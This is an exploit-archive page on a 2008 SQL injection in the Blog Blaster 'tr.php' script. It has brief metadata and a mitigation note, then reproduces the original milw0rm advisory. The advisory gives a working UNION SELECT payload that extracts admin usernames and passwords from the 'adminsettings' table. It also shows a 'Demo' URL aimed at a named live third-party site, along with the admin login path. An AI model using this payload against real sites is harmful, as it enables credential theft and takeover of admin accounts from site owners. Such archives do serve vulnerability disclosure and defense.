header-logo
Suggest Exploit
vendor:
Blog Blaster
by:
Hussin X
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Blog Blaster
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Blog Blaster( id ) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to 'tr.php' script. A remote attacker can execute arbitrary SQL commands in application's database, inject arbitrary HTML and script code, steal sensitive information, modify data, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is recommended to use parameterized queries instead of dynamic queries.
Source

Exploit-DB raw data:

Blog Blaster( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    : http://www.yourfreeworld.com/script/blogblaster.php

DorK   : :)

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Demo :
_______

http://www.downlinegoldmine.com/blogblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Admin Login :
_______
/admin/




Greetz : All my freind

# milw0rm.com [2008-11-01]